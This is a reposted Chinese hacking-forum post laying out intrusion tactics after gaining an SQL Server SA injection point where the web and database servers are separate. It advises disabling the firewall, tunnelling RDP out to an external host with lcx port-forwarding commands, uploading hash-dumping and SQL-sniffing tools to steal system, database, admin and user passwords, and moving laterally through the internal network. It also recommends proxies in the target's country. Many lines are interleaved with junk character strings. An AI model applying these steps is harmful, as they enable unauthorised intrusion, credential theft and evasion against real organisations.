中国网络渗透测试联盟

标题: SA权限网站和数据库分离的一些思路 [打印本页]
作者: admin    时间: 2013-2-16 21:46
标题: SA权限网站和数据库分离的一些思路
当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。. P% P; [5 N; O1 F9 h& v
' _5 d5 {% a8 P3 y# g2 @2 q
7 a( b2 C- F$ @0 p

/ \+ E6 j( Q/ S$ lSA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)% P3 Z) Z* @* P4 Y
: c( O6 l7 p4 y9 p; K  P
$ W5 x% J; C: h. m( u6 M
一、DB机有公网IP.
6 y1 i! Z" |# {) p! z
. E& Z) g! a0 w/ m3 q' L6 w1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.
' }' u+ e$ n7 G/ x
) ~' G2 K/ b1 N) w$ A8 N5 d4 B  T1 o
- X5 c; i& o+ q4 J2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.
& U4 e; s& @" S# S! V. x9 _# d8 P; P# |1 d

3 ]$ W- ~. [6 |8 }4 ]6 z* E( W3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com
% }& W# y3 f' I+ G) x- u' [1 F' k
0 m& B1 I$ d6 H2 K( u/ h
4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.
% R* f' ]  x$ I! U  D0 U; n- F. E" q! y; D2 g- |3 y& {' B4 {

/ N: T2 w3 v5 h2 q4 ~4 D; [/ A
4 e3 z6 d- T. L2 X* w; _% b二、DB机只有内网IP
( K# U0 B2 |  I; F+ Z9 b
% J1 \. s% X+ C% d0 {2 L6 c8 h8 V1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.6 }4 z: J, y, s
5 Q" z1 C0 \0 I4 m
$ B) m! s1 E8 {" L4 m' R6 Y
2:停掉防火墙和IP策略再从内往外扫描.
' A/ A2 ?" g: m  l, O9 Y1 {1 {
0 a8 ?0 S8 s. G' Y. k- U, t, H/ J5 D
3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.
% Z, ~+ g7 ~$ A9 O; _
: r9 _# [, o# o3 Y) S1 \$ v' c
1 Z# I( n; C6 E& H2 J5 Y4:学会密码规律分析往往会有惊喜.
$ k0 ^  j) p; F: Q8 ?7 q+ V: c4 J- U" a# o: y5 Z

# x! q" p, [2 z. t: _9 {- Q5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等
% E" e4 a7 E2 o7 A8 E" v$ h# b7 [' o( d, X% P- ]2 t
9 p- ]( T8 t. h6 ~
有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的​



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2